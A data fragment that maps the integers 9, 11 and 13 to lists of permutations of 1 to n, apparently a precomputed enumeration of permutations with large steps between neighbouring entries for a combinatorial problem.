9:[(1,5,9,4,8,3,7,2,6),(1,6,2,7,3,8,4,9,5),(2,6,1,5,9,4,8,3,7),(2,6,1,7,3,8,4,9,5),(2,7,3,8,4,9,5,1,6),(3,7,1,5,9,4,8,2,6),(3,7,1,6,2,8,4,9,5),(3,7,2,6,1,5,9,4,8),(3,7,2,6,1,8,4,9,5),(3,7,2,8,4,9,5,1,6),(3,8,4,9,5,1,6,2,7),(3,8,4,9,5,1,7,2,6),(4,8,1,5,9,3,7,2,6),(4,8,1,6,2,7,3,9,5),(4,8,2,6,1,5,9,3,7),(4,8,2,6,1,7,3,9,5),(4,8,2,7,3,9,5,1,6),(4,8,3,7,1,5,9,2,6),(4,8,3,7,1,6,2,9,5),(4,8,3,7,2,6,1,5,9),(4,8,3,7,2,6,1,9,5),(4,8,3,7,2,9,5,1,6),(4,8,3,9,5,1,6,2,7),(4,8,3,9,5,1,7,2,6),(4,9,5,1,6,2,7,3,8),(4,9,5,1,6,2,8,3,7),(4,9,5,1,7,3,8,2,6),(4,9,5,1,8,3,7,2,6),(5,1,6,2,7,3,8,4,9),(5,1,6,2,7,3,9,4,8),(5,1,6,2,8,4,9,3,7),(5,1,6,2,9,4,8,3,7),(5,1,7,3,8,4,9,2,6),(5,1,7,3,9,4,8,2,6),(5,1,8,4,9,3,7,2,6),(5,1,9,4,8,3,7,2,6),(5,9,1,6,2,7,3,8,4),(5,9,2,6,1,7,3,8,4),(5,9,3,7,1,6,2,8,4),(5,9,3,7,2,6,1,8,4),(5,9,4,8,1,6,2,7,3),(5,9,4,8,2,6,1,7,3),(5,9,4,8,3,7,1,6,2),(5,9,4,8,3,7,2,6,1),(6,1,5,9,2,7,3,8,4),(6,1,5,9,3,7,2,8,4),(6,1,5,9,4,8,2,7,3),(6,1,5,9,4,8,3,7,2),(6,2,7,1,5,9,3,8,4),(6,2,7,1,5,9,4,8,3),(6,2,7,3,8,1,5,9,4),(6,2,7,3,8,4,9,1,5),(6,2,7,3,8,4,9,5,1),(6,2,7,3,9,4,8,1,5),(6,2,7,3,9,5,1,8,4),(6,2,8,3,7,1,5,9,4),(6,2,8,4,9,3,7,1,5),(6,2,8,4,9,5,1,7,3),(6,2,9,4,8,3,7,1,5),(6,2,9,5,1,7,3,8,4),(7,2,6,1,5,9,3,8,4),(7,2,6,1,5,9,4,8,3),(7,3,8,2,6,1,5,9,4),(7,3,8,4,9,2,6,1,5),(7,3,8,4,9,5,1,6,2),(7,3,9,4,8,2,6,1,5),(7,3,9,5,1,6,2,8,4),(8,3,7,2,6,1,5,9,4),(8,4,9,3,7,2,6,1,5),(8,4,9,5,1,6,2,7,3),(9,4,8,3,7,2,6,1,5),(9,5,1,6,2,7,3,8,4)],
11:[(1,6,11,5,10,4,9,3,8,2,7),(1,7,2,8,3,9,4,10,5,11,6),(2,7,1,6,11,5,10,4,9,3,8),(2,7,1,8,3,9,4,10,5,11,6),(2,8,3,9,4,10,5,11,6,1,7),(3,8,1,6,11,5,10,4,9,2,7),(3,8,1,7,2,9,4,10,5,11,6),(3,8,2,7,1,6,11,5,10,4,9),(3,8,2,7,1,9,4,10,5,11,6),(3,8,2,9,4,10,5,11,6,1,7),(3,9,4,10,5,11,6,1,7,2,8),(3,9,4,10,5,11,6,1,8,2,7),(4,9,1,6,11,5,10,3,8,2,7),(4,9,1,7,2,8,3,10,5,11,6),(4,9,2,7,1,6,11,5,10,3,8),(4,9,2,7,1,8,3,10,5,11,6),(4,9,2,8,3,10,5,11,6,1,7),(4,9,3,8,1,6,11,5,10,2,7),(4,9,3,8,1,7,2,10,5,11,6),(4,9,3,8,2,7,1,6,11,5,10),(4,9,3,8,2,7,1,10,5,11,6),(4,9,3,8,2,10,5,11,6,1,7),(4,9,3,10,5,11,6,1,7,2,8),(4,9,3,10,5,11,6,1,8,2,7),(4,10,5,11,6,1,7,2,8,3,9),(4,10,5,11,6,1,7,2,9,3,8),(4,10,5,11,6,1,8,3,9,2,7),(4,10,5,11,6,1,9,3,8,2,7),(5,10,1,6,11,4,9,3,8,2,7),(5,10,1,7,2,8,3,9,4,11,6),(5,10,2,7,1,6,11,4,9,3,8),(5,10,2,7,1,8,3,9,4,11,6),(5,10,2,8,3,9,4,11,6,1,7),(5,10,3,8,1,6,11,4,9,2,7),(5,10,3,8,1,7,2,9,4,11,6),(5,10,3,8,2,7,1,6,11,4,9),(5,10,3,8,2,7,1,9,4,11,6),(5,10,3,8,2,9,4,11,6,1,7),(5,10,3,9,4,11,6,1,7,2,8),(5,10,3,9,4,11,6,1,8,2,7),(5,10,4,9,1,6,11,3,8,2,7),(5,10,4,9,1,7,2,8,3,11,6),(5,10,4,9,2,7,1,6,11,3,8),(5,10,4,9,2,7,1,8,3,11,6),(5,10,4,9,2,8,3,11,6,1,7),(5,10,4,9,3,8,1,6,11,2,7),(5,10,4,9,3,8,1,7,2,11,6),(5,10,4,9,3,8,2,7,1,6,11),(5,10,4,9,3,8,2,7,1,11,6),(5,10,4,9,3,8,2,11,6,1,7),(5,10,4,9,3,11,6,1,7,2,8),(5,10,4,9,3,11,6,1,8,2,7),(5,10,4,11,6,1,7,2,8,3,9),(5,10,4,11,6,1,7,2,9,3,8),(5,10,4,11,6,1,8,3,9,2,7),(5,10,4,11,6,1,9,3,8,2,7),(5,11,6,1,7,2,8,3,9,4,10),(5,11,6,1,7,2,8,3,10,4,9),(5,11,6,1,7,2,9,4,10,3,8),(5,11,6,1,7,2,10,4,9,3,8),(5,11,6,1,8,3,9,4,10,2,7),(5,11,6,1,8,3,10,4,9,2,7),(5,11,6,1,9,4,10,3,8,2,7),(5,11,6,1,10,4,9,3,8,2,7),(6,1,7,2,8,3,9,4,10,5,11),(6,1,7,2,8,3,9,4,11,5,10),(6,1,7,2,8,3,10,5,11,4,9),(6,1,7,2,8,3,11,5,10,4,9),(6,1,7,2,9,4,10,5,11,3,8),(6,1,7,2,9,4,11,5,10,3,8),(6,1,7,2,10,5,11,4,9,3,8),(6,1,7,2,11,5,10,4,9,3,8),(6,1,8,3,9,4,10,5,11,2,7),(6,1,8,3,9,4,11,5,10,2,7),(6,1,8,3,10,5,11,4,9,2,7),(6,1,8,3,11,5,10,4,9,2,7),(6,1,9,4,10,5,11,3,8,2,7),(6,1,9,4,11,5,10,3,8,2,7),(6,1,10,5,11,4,9,3,8,2,7),(6,1,11,5,10,4,9,3,8,2,7),(6,11,1,7,2,8,3,9,4,10,5),(6,11,2,7,1,8,3,9,4,10,5),(6,11,3,8,1,7,2,9,4,10,5),(6,11,3,8,2,7,1,9,4,10,5),(6,11,4,9,1,7,2,8,3,10,5),(6,11,4,9,2,7,1,8,3,10,5),(6,11,4,9,3,8,1,7,2,10,5),(6,11,4,9,3,8,2,7,1,10,5),(6,11,5,10,1,7,2,8,3,9,4),(6,11,5,10,2,7,1,8,3,9,4),(6,11,5,10,3,8,1,7,2,9,4),(6,11,5,10,3,8,2,7,1,9,4),(6,11,5,10,4,9,1,7,2,8,3),(6,11,5,10,4,9,2,7,1,8,3),(6,11,5,10,4,9,3,8,1,7,2),(6,11,5,10,4,9,3,8,2,7,1),(7,1,6,11,2,8,3,9,4,10,5),(7,1,6,11,3,8,2,9,4,10,5),(7,1,6,11,4,9,2,8,3,10,5),(7,1,6,11,4,9,3,8,2,10,5),(7,1,6,11,5,10,2,8,3,9,4),(7,1,6,11,5,10,3,8,2,9,4),(7,1,6,11,5,10,4,9,2,8,3),(7,1,6,11,5,10,4,9,3,8,2),(7,2,8,1,6,11,3,9,4,10,5),(7,2,8,1,6,11,4,9,3,10,5),(7,2,8,1,6,11,5,10,3,9,4),(7,2,8,1,6,11,5,10,4,9,3),(7,2,8,3,9,1,6,11,4,10,5),(7,2,8,3,9,1,6,11,5,10,4),(7,2,8,3,9,4,10,1,6,11,5),(7,2,8,3,9,4,10,5,11,1,6),(7,2,8,3,9,4,10,5,11,6,1),(7,2,8,3,9,4,11,5,10,1,6),(7,2,8,3,9,4,11,6,1,10,5),(7,2,8,3,10,4,9,1,6,11,5),(7,2,8,3,10,5,11,4,9,1,6),(7,2,8,3,10,5,11,6,1,9,4),(7,2,8,3,11,5,10,4,9,1,6),(7,2,8,3,11,6,1,9,4,10,5),(7,2,9,3,8,1,6,11,4,10,5),(7,2,9,3,8,1,6,11,5,10,4),(7,2,9,4,10,3,8,1,6,11,5),(7,2,9,4,10,5,11,3,8,1,6),(7,2,9,4,10,5,11,6,1,8,3),(7,2,9,4,11,5,10,3,8,1,6),(7,2,9,4,11,6,1,8,3,10,5),(7,2,10,4,9,3,8,1,6,11,5),(7,2,10,5,11,4,9,3,8,1,6),(7,2,10,5,11,6,1,8,3,9,4),(7,2,11,5,10,4,9,3,8,1,6),(7,2,11,6,1,8,3,9,4,10,5),(8,2,7,1,6,11,3,9,4,10,5),(8,2,7,1,6,11,4,9,3,10,5),(8,2,7,1,6,11,5,10,3,9,4),(8,2,7,1,6,11,5,10,4,9,3),(8,3,9,2,7,1,6,11,4,10,5),(8,3,9,2,7,1,6,11,5,10,4),(8,3,9,4,10,2,7,1,6,11,5),(8,3,9,4,10,5,11,2,7,1,6),(8,3,9,4,10,5,11,6,1,7,2),(8,3,9,4,11,5,10,2,7,1,6),(8,3,9,4,11,6,1,7,2,10,5),(8,3,10,4,9,2,7,1,6,11,5),(8,3,10,5,11,4,9,2,7,1,6),(8,3,10,5,11,6,1,7,2,9,4),(8,3,11,5,10,4,9,2,7,1,6),(8,3,11,6,1,7,2,9,4,10,5),(9,3,8,2,7,1,6,11,4,10,5),(9,3,8,2,7,1,6,11,5,10,4),(9,4,10,3,8,2,7,1,6,11,5),(9,4,10,5,11,3,8,2,7,1,6),(9,4,10,5,11,6,1,7,2,8,3),(9,4,11,5,10,3,8,2,7,1,6),(9,4,11,6,1,7,2,8,3,10,5),(10,4,9,3,8,2,7,1,6,11,5),(10,5,11,4,9,3,8,2,7,1,6),(10,5,11,6,1,7,2,8,3,9,4),(11,5,10,4,9,3,8,2,7,1,6),(11,6,1,7,2,8,3,9,4,10,5)],
13:[(1,7,13,6,12,5,11,4,10,3,9,2,8),(1,8,2,9,3,10,4,11,5,12,6,13,7),(2,8,1,7,13,6,12,5,11,4,10,3,9),(2,8,1,9,3,10,4,11,5,12,6,13,7),(2,9,3,10,4,11,5,12,6,13,7,1,8),(3,9,1,7,13,6,12,5,11,4,10,2,8),(3,9,1,8,2,10,4,11,5,12,6,13,7),(3,9,2,8,1,7,13,6,12,5,11,4,10),(3,9,2,8,1,10,4,11,5,12,6,13,7),(3,9,2,10,4,11,5,12,6,13,7,1,8),(3,10,4,11,5,12,6,13,7,1,8,2,9),(3,10,4,11,5,12,6,13,7,1,9,2,8),(4,10,1,7,13,6,12,5,11,3,9,2,8),(4,10,1,8,2,9,3,11,5,12,6,13,7),(4,10,2,8,1,7,13,6,12,5,11,3,9),(4,10,2,8,1,9,3,11,5,12,6,13,7),(4,10,2,9,3,11,5,12,6,13,7,1,8),(4,10,3,9,1,7,13,6,12,5,11,2,8),(4,10,3,9,1,8,2,11,5,12,6,13,7),(4,10,3,9,2,8,1,7,13,6,12,5,11),(4,10,3,9,2,8,1,11,5,12,6,13,7),(4,10,3,9,2,11,5,12,6,13,7,1,8),(4,10,3,11,5,12,6,13,7,1,8,2,9),(4,10,3,11,5,12,6,13,7,1,9,2,8),(4,11,5,12,6,13,7,1,8,2,9,3,10),(4,11,5,12,6,13,7,1,8,2,10,3,9),(4,11,5,12,6,13,7,1,9,3,10,2,8),(4,11,5,12,6,13,7,1,10,3,9,2,8),(5,11,1,7,13,6,12,4,10,3,9,2,8),(5,11,1,8,2,9,3,10,4,12,6,13,7),(5,11,2,8,1,7,13,6,12,4,10,3,9),(5,11,2,8,1,9,3,10,4,12,6,13,7),(5,11,2,9,3,10,4,12,6,13,7,1,8),(5,11,3,9,1,7,13,6,12,4,10,2,8),(5,11,3,9,1,8,2,10,4,12,6,13,7),(5,11,3,9,2,8,1,7,13,6,12,4,10),(5,11,3,9,2,8,1,10,4,12,6,13,7),(5,11,3,9,2,10,4,12,6,13,7,1,8),(5,11,3,10,4,12,6,13,7,1,8,2,9),(5,11,3,10,4,12,6,13,7,1,9,2,8),(5,11,4,10,1,7,13,6,12,3,9,2,8),(5,11,4,10,1,8,2,9,3,12,6,13,7),(5,11,4,10,2,8,1,7,13,6,12,3,9),(5,11,4,10,2,8,1,9,3,12,6,13,7),(5,11,4,10,2,9,3,12,6,13,7,1,8),(5,11,4,10,3,9,1,7,13,6,12,2,8),(5,11,4,10,3,9,1,8,2,12,6,13,7),(5,11,4,10,3,9,2,8,1,7,13,6,12),(5,11,4,10,3,9,2,8,1,12,6,13,7),(5,11,4,10,3,9,2,12,6,13,7,1,8),(5,11,4,10,3,12,6,13,7,1,8,2,9),(5,11,4,10,3,12,6,13,7,1,9,2,8),(5,11,4,12,6,13,7,1,8,2,9,3,10),(5,11,4,12,6,13,7,1,8,2,10,3,9),(5,11,4,12,6,13,7,1,9,3,10,2,8),(5,11,4,12,6,13,7,1,10,3,9,2,8),(5,12,6,13,7,1,8,2,9,3,10,4,11),(5,12,6,13,7,1,8,2,9,3,11,4,10),(5,12,6,13,7,1,8,2,10,4,11,3,9),(5,12,6,13,7,1,8,2,11,4,10,3,9),(5,12,6,13,7,1,9,3,10,4,11,2,8),(5,12,6,13,7,1,9,3,11,4,10,2,8),(5,12,6,13,7,1,10,4,11,3,9,2,8),(5,12,6,13,7,1,11,4,10,3,9,2,8),(6,12,1,7,13,5,11,4,10,3,9,2,8),(6,12,1,8,2,9,3,10,4,11,5,13,7),(6,12,2,8,1,7,13,5,11,4,10,3,9),(6,12,2,8,1,9,3,10,4,11,5,13,7),(6,12,2,9,3,10,4,11,5,13,7,1,8),(6,12,3,9,1,7,13,5,11,4,10,2,8),(6,12,3,9,1,8,2,10,4,11,5,13,7),(6,12,3,9,2,8,1,7,13,5,11,4,10),(6,12,3,9,2,8,1,10,4,11,5,13,7),(6,12,3,9,2,10,4,11,5,13,7,1,8),(6,12,3,10,4,11,5,13,7,1,8,2,9),(6,12,3,10,4,11,5,13,7,1,9,2,8),(6,12,4,10,1,7,13,5,11,3,9,2,8),(6,12,4,10,1,8,2,9,3,11,5,13,7),(6,12,4,10,2,8,1,7,13,5,11,3,9),(6,12,4,10,2,8,1,9,3,11,5,13,7),(6,12,4,10,2,9,3,11,5,13,7,1,8),(6,12,4,10,3,9,1,7,13,5,11,2,8),(6,12,4,10,3,9,1,8,2,11,5,13,7),(6,12,4,10,3,9,2,8,1,7,13,5,11),(6,12,4,10,3,9,2,8,1,11,5,13,7),(6,12,4,10,3,9,2,11,5,13,7,1,8),(6,12,4,10,3,11,5,13,7,1,8,2,9),(6,12,4,10,3,11,5,13,7,1,9,2,8),(6,12,4,11,5,13,7,1,8,2,9,3,10),(6,12,4,11,5,13,7,1,8,2,10,3,9),(6,12,4,11,5,13,7,1,9,3,10,2,8),(6,12,4,11,5,13,7,1,10,3,9,2,8),(6,12,5,11,1,7,13,4,10,3,9,2,8),(6,12,5,11,1,8,2,9,3,10,4,13,7),(6,12,5,11,2,8,1,7,13,4,10,3,9),(6,12,5,11,2,8,1,9,3,10,4,13,7),(6,12,5,11,2,9,3,10,4,13,7,1,8),(6,12,5,11,3,9,1,7,13,4,10,2,8),(6,12,5,11,3,9,1,8,2,10,4,13,7),(6,12,5,11,3,9,2,8,1,7,13,4,10),(6,12,5,11,3,9,2,8,1,10,4,13,7),(6,12,5,11,3,9,2,10,4,13,7,1,8),(6,12,5,11,3,10,4,13,7,1,8,2,9),(6,12,5,11,3,10,4,13,7,1,9,2,8),(6,12,5,11,4,10,1,7,13,3,9,2,8),(6,12,5,11,4,10,1,8,2,9,3,13,7),(6,12,5,11,4,10,2,8,1,7,13,3,9),(6,12,5,11,4,10,2,8,1,9,3,13,7),(6,12,5,11,4,10,2,9,3,13,7,1,8),(6,12,5,11,4,10,3,9,1,7,13,2,8),(6,12,5,11,4,10,3,9,1,8,2,13,7),(6,12,5,11,4,10,3,9,2,8,1,7,13),(6,12,5,11,4,10,3,9,2,8,1,13,7),(6,12,5,11,4,10,3,9,2,13,7,1,8),(6,12,5,11,4,10,3,13,7,1,8,2,9),(6,12,5,11,4,10,3,13,7,1,9,2,8),(6,12,5,11,4,13,7,1,8,2,9,3,10),(6,12,5,11,4,13,7,1,8,2,10,3,9),(6,12,5,11,4,13,7,1,9,3,10,2,8),(6,12,5,11,4,13,7,1,10,3,9,2,8),(6,12,5,13,7,1,8,2,9,3,10,4,11),(6,12,5,13,7,1,8,2,9,3,11,4,10),(6,12,5,13,7,1,8,2,10,4,11,3,9),(6,12,5,13,7,1,8,2,11,4,10,3,9),(6,12,5,13,7,1,9,3,10,4,11,2,8),(6,12,5,13,7,1,9,3,11,4,10,2,8),(6,12,5,13,7,1,10,4,11,3,9,2,8),(6,12,5,13,7,1,11,4,10,3,9,2,8),(6,13,7,1,8,2,9,3,10,4,11,5,12),(6,13,7,1,8,2,9,3,10,4,12,5,11),(6,13,7,1,8,2,9,3,11,5,12,4,10),(6,13,7,1,8,2,9,3,12,5,11,4,10),(6,13,7,1,8,2,10,4,11,5,12,3,9),(6,13,7,1,8,2,10,4,12,5,11,3,9),(6,13,7,1,8,2,11,5,12,4,10,3,9),(6,13,7,1,8,2,12,5,11,4,10,3,9),(6,13,7,1,9,3,10,4,11,5,12,2,8),(6,13,7,1,9,3,10,4,12,5,11,2,8),(6,13,7,1,9,3,11,5,12,4,10,2,8),(6,13,7,1,9,3,12,5,11,4,10,2,8),(6,13,7,1,10,4,11,5,12,3,9,2,8),(6,13,7,1,10,4,12,5,11,3,9,2,8),(6,13,7,1,11,5,12,4,10,3,9,2,8),(6,13,7,1,12,5,11,4,10,3,9,2,8),(7,1,8,2,9,3,10,4,11,5,12,6,13),(7,1,8,2,9,3,10,4,11,5,13,6,12),(7,1,8,2,9,3,10,4,12,6,13,5,11),(7,1,8,2,9,3,10,4,13,6,12,5,11),(7,1,8,2,9,3,11,5,12,6,13,4,10),(7,1,8,2,9,3,11,5,13,6,12,4,10),(7,1,8,2,9,3,12,6,13,5,11,4,10),(7,1,8,2,9,3,13,6,12,5,11,4,10),(7,1,8,2,10,4,11,5,12,6,13,3,9),(7,1,8,2,10,4,11,5,13,6,12,3,9),(7,1,8,2,10,4,12,6,13,5,11,3,9),(7,1,8,2,10,4,13,6,12,5,11,3,9),(7,1,8,2,11,5,12,6,13,4,10,3,9),(7,1,8,2,11,5,13,6,12,4,10,3,9),(7,1,8,2,12,6,13,5,11,4,10,3,9),(7,1,8,2,13,6,12,5,11,4,10,3,9),(7,1,9,3,10,4,11,5,12,6,13,2,8),(7,1,9,3,10,4,11,5,13,6,12,2,8),(7,1,9,3,10,4,12,6,13,5,11,2,8),(7,1,9,3,10,4,13,6,12,5,11,2,8),(7,1,9,3,11,5,12,6,13,4,10,2,8),(7,1,9,3,11,5,13,6,12,4,10,2,8),(7,1,9,3,12,6,13,5,11,4,10,2,8),(7,1,9,3,13,6,12,5,11,4,10,2,8),(7,1,10,4,11,5,12,6,13,3,9,2,8),(7,1,10,4,11,5,13,6,12,3,9,2,8),(7,1,10,4,12,6,13,5,11,3,9,2,8),(7,1,10,4,13,6,12,5,11,3,9,2,8),(7,1,11,5,12,6,13,4,10,3,9,2,8),(7,1,11,5,13,6,12,4,10,3,9,2,8),(7,1,12,6,13,5,11,4,10,3,9,2,8),(7,1,13,6,12,5,11,4,10,3,9,2,8),(7,13,1,8,2,9,3,10,4,11,5,12,6),(7,13,2,8,1,9,3,10,4,11,5,12,6),(7,13,3,9,1,8,2,10,4,11,5,12,6),(7,13,3,9,2,8,1,10,4,11,5,12,6),(7,13,4,10,1,8,2,9,3,11,5,12,6),(7,13,4,10,2,8,1,9,3,11,5,12,6),(7,13,4,10,3,9,1,8,2,11,5,12,6),(7,13,4,10,3,9,2,8,1,11,5,12,6),(7,13,5,11,1,8,2,9,3,10,4,12,6),(7,13,5,11,2,8,1,9,3,10,4,12,6),(7,13,5,11,3,9,1,8,2,10,4,12,6),(7,13,5,11,3,9,2,8,1,10,4,12,6),(7,13,5,11,4,10,1,8,2,9,3,12,6),(7,13,5,11,4,10,2,8,1,9,3,12,6),(7,13,5,11,4,10,3,9,1,8,2,12,6),(7,13,5,11,4,10,3,9,2,8,1,12,6),(7,13,6,12,1,8,2,9,3,10,4,11,5),(7,13,6,12,2,8,1,9,3,10,4,11,5),(7,13,6,12,3,9,1,8,2,10,4,11,5),(7,13,6,12,3,9,2,8,1,10,4,11,5),(7,13,6,12,4,10,1,8,2,9,3,11,5),(7,13,6,12,4,10,2,8,1,9,3,11,5),(7,13,6,12,4,10,3,9,1,8,2,11,5),(7,13,6,12,4,10,3,9,2,8,1,11,5),(7,13,6,12,5,11,1,8,2,9,3,10,4),(7,13,6,12,5,11,2,8,1,9,3,10,4),(7,13,6,12,5,11,3,9,1,8,2,10,4),(7,13,6,12,5,11,3,9,2,8,1,10,4),(7,13,6,12,5,11,4,10,1,8,2,9,3),(7,13,6,12,5,11,4,10,2,8,1,9,3),(7,13,6,12,5,11,4,10,3,9,1,8,2),(7,13,6,12,5,11,4,10,3,9,2,8,1),(8,1,7,13,2,9,3,10,4,11,5,12,6),(8,1,7,13,3,9,2,10,4,11,5,12,6),(8,1,7,13,4,10,2,9,3,11,5,12,6),(8,1,7,13,4,10,3,9,2,11,5,12,6),(8,1,7,13,5,11,2,9,3,10,4,12,6),(8,1,7,13,5,11,3,9,2,10,4,12,6),(8,1,7,13,5,11,4,10,2,9,3,12,6),(8,1,7,13,5,11,4,10,3,9,2,12,6),(8,1,7,13,6,12,2,9,3,10,4,11,5),(8,1,7,13,6,12,3,9,2,10,4,11,5),(8,1,7,13,6,12,4,10,2,9,3,11,5),(8,1,7,13,6,12,4,10,3,9,2,11,5),(8,1,7,13,6,12,5,11,2,9,3,10,4),(8,1,7,13,6,12,5,11,3,9,2,10,4),(8,1,7,13,6,12,5,11,4,10,2,9,3),(8,1,7,13,6,12,5,11,4,10,3,9,2),(8,2,9,1,7,13,3,10,4,11,5,12,6),(8,2,9,1,7,13,4,10,3,11,5,12,6),(8,2,9,1,7,13,5,11,3,10,4,12,6),(8,2,9,1,7,13,5,11,4,10,3,12,6),(8,2,9,1,7,13,6,12,3,10,4,11,5),(8,2,9,1,7,13,6,12,4,10,3,11,5),(8,2,9,1,7,13,6,12,5,11,3,10,4),(8,2,9,1,7,13,6,12,5,11,4,10,3),(8,2,9,3,10,1,7,13,4,11,5,12,6),(8,2,9,3,10,1,7,13,5,11,4,12,6),(8,2,9,3,10,1,7,13,6,12,4,11,5),(8,2,9,3,10,1,7,13,6,12,5,11,4),(8,2,9,3,10,4,11,1,7,13,5,12,6),(8,2,9,3,10,4,11,1,7,13,6,12,5),(8,2,9,3,10,4,11,5,12,1,7,13,6),(8,2,9,3,10,4,11,5,12,6,13,1,7),(8,2,9,3,10,4,11,5,12,6,13,7,1),(8,2,9,3,10,4,11,5,13,6,12,1,7),(8,2,9,3,10,4,11,5,13,7,1,12,6),(8,2,9,3,10,4,12,5,11,1,7,13,6),(8,2,9,3,10,4,12,6,13,5,11,1,7),(8,2,9,3,10,4,12,6,13,7,1,11,5),(8,2,9,3,10,4,13,6,12,5,11,1,7),(8,2,9,3,10,4,13,7,1,11,5,12,6),(8,2,9,3,11,4,10,1,7,13,5,12,6),(8,2,9,3,11,4,10,1,7,13,6,12,5),(8,2,9,3,11,5,12,4,10,1,7,13,6),(8,2,9,3,11,5,12,6,13,4,10,1,7),(8,2,9,3,11,5,12,6,13,7,1,10,4),(8,2,9,3,11,5,13,6,12,4,10,1,7),(8,2,9,3,11,5,13,7,1,10,4,12,6),(8,2,9,3,12,5,11,4,10,1,7,13,6),(8,2,9,3,12,6,13,5,11,4,10,1,7),(8,2,9,3,12,6,13,7,1,10,4,11,5),(8,2,9,3,13,6,12,5,11,4,10,1,7),(8,2,9,3,13,7,1,10,4,11,5,12,6),(8,2,10,3,9,1,7,13,4,11,5,12,6),(8,2,10,3,9,1,7,13,5,11,4,12,6),(8,2,10,3,9,1,7,13,6,12,4,11,5),(8,2,10,3,9,1,7,13,6,12,5,11,4),(8,2,10,4,11,3,9,1,7,13,5,12,6),(8,2,10,4,11,3,9,1,7,13,6,12,5),(8,2,10,4,11,5,12,3,9,1,7,13,6),(8,2,10,4,11,5,12,6,13,3,9,1,7),(8,2,10,4,11,5,12,6,13,7,1,9,3),(8,2,10,4,11,5,13,6,12,3,9,1,7),(8,2,10,4,11,5,13,7,1,9,3,12,6),(8,2,10,4,12,5,11,3,9,1,7,13,6),(8,2,10,4,12,6,13,5,11,3,9,1,7),(8,2,10,4,12,6,13,7,1,9,3,11,5),(8,2,10,4,13,6,12,5,11,3,9,1,7),(8,2,10,4,13,7,1,9,3,11,5,12,6),(8,2,11,4,10,3,9,1,7,13,5,12,6),(8,2,11,4,10,3,9,1,7,13,6,12,5),(8,2,11,5,12,4,10,3,9,1,7,13,6),(8,2,11,5,12,6,13,4,10,3,9,1,7),(8,2,11,5,12,6,13,7,1,9,3,10,4),(8,2,11,5,13,6,12,4,10,3,9,1,7),(8,2,11,5,13,7,1,9,3,10,4,12,6),(8,2,12,5,11,4,10,3,9,1,7,13,6),(8,2,12,6,13,5,11,4,10,3,9,1,7),(8,2,12,6,13,7,1,9,3,10,4,11,5),(8,2,13,6,12,5,11,4,10,3,9,1,7),(8,2,13,7,1,9,3,10,4,11,5,12,6),(9,2,8,1,7,13,3,10,4,11,5,12,6),(9,2,8,1,7,13,4,10,3,11,5,12,6),(9,2,8,1,7,13,5,11,3,10,4,12,6),(9,2,8,1,7,13,5,11,4,10,3,12,6),(9,2,8,1,7,13,6,12,3,10,4,11,5),(9,2,8,1,7,13,6,12,4,10,3,11,5),(9,2,8,1,7,13,6,12,5,11,3,10,4),(9,2,8,1,7,13,6,12,5,11,4,10,3),(9,3,10,2,8,1,7,13,4,11,5,12,6),(9,3,10,2,8,1,7,13,5,11,4,12,6),(9,3,10,2,8,1,7,13,6,12,4,11,5),(9,3,10,2,8,1,7,13,6,12,5,11,4),(9,3,10,4,11,2,8,1,7,13,5,12,6),(9,3,10,4,11,2,8,1,7,13,6,12,5),(9,3,10,4,11,5,12,2,8,1,7,13,6),(9,3,10,4,11,5,12,6,13,2,8,1,7),(9,3,10,4,11,5,12,6,13,7,1,8,2),(9,3,10,4,11,5,13,6,12,2,8,1,7),(9,3,10,4,11,5,13,7,1,8,2,12,6),(9,3,10,4,12,5,11,2,8,1,7,13,6),(9,3,10,4,12,6,13,5,11,2,8,1,7),(9,3,10,4,12,6,13,7,1,8,2,11,5),(9,3,10,4,13,6,12,5,11,2,8,1,7),(9,3,10,4,13,7,1,8,2,11,5,12,6),(9,3,11,4,10,2,8,1,7,13,5,12,6),(9,3,11,4,10,2,8,1,7,13,6,12,5),(9,3,11,5,12,4,10,2,8,1,7,13,6),(9,3,11,5,12,6,13,4,10,2,8,1,7),(9,3,11,5,12,6,13,7,1,8,2,10,4),(9,3,11,5,13,6,12,4,10,2,8,1,7),(9,3,11,5,13,7,1,8,2,10,4,12,6),(9,3,12,5,11,4,10,2,8,1,7,13,6),(9,3,12,6,13,5,11,4,10,2,8,1,7),(9,3,12,6,13,7,1,8,2,10,4,11,5),(9,3,13,6,12,5,11,4,10,2,8,1,7),(9,3,13,7,1,8,2,10,4,11,5,12,6),(10,3,9,2,8,1,7,13,4,11,5,12,6),(10,3,9,2,8,1,7,13,5,11,4,12,6),(10,3,9,2,8,1,7,13,6,12,4,11,5),(10,3,9,2,8,1,7,13,6,12,5,11,4),(10,4,11,3,9,2,8,1,7,13,5,12,6),(10,4,11,3,9,2,8,1,7,13,6,12,5),(10,4,11,5,12,3,9,2,8,1,7,13,6),(10,4,11,5,12,6,13,3,9,2,8,1,7),(10,4,11,5,12,6,13,7,1,8,2,9,3),(10,4,11,5,13,6,12,3,9,2,8,1,7),(10,4,11,5,13,7,1,8,2,9,3,12,6),(10,4,12,5,11,3,9,2,8,1,7,13,6),(10,4,12,6,13,5,11,3,9,2,8,1,7),(10,4,12,6,13,7,1,8,2,9,3,11,5),(10,4,13,6,12,5,11,3,9,2,8,1,7),(10,4,13,7,1,8,2,9,3,11,5,12,6),(11,4,10,3,9,2,8,1,7,13,5,12,6),(11,4,10,3,9,2,8,1,7,13,6,12,5),(11,5,12,4,10,3,9,2,8,1,7,13,6),(11,5,12,6,13,4,10,3,9,2,8,1,7),(11,5,12,6,13,7,1,8,2,9,3,10,4),(11,5,13,6,12,4,10,3,9,2,8,1,7),(11,5,13,7,1,8,2,9,3,10,4,12,6),(12,5,11,4,10,3,9,2,8,1,7,13,6),(12,6,13,5,11,4,10,3,9,2,8,1,7),(12,6,13,7,1,8,2,9,3,10,4,11,5),(13,6,12,5,11,4,10,3,9,2,8,1,7),(13,7,1,8,2,9,3,10,4,11,5,12,6)],
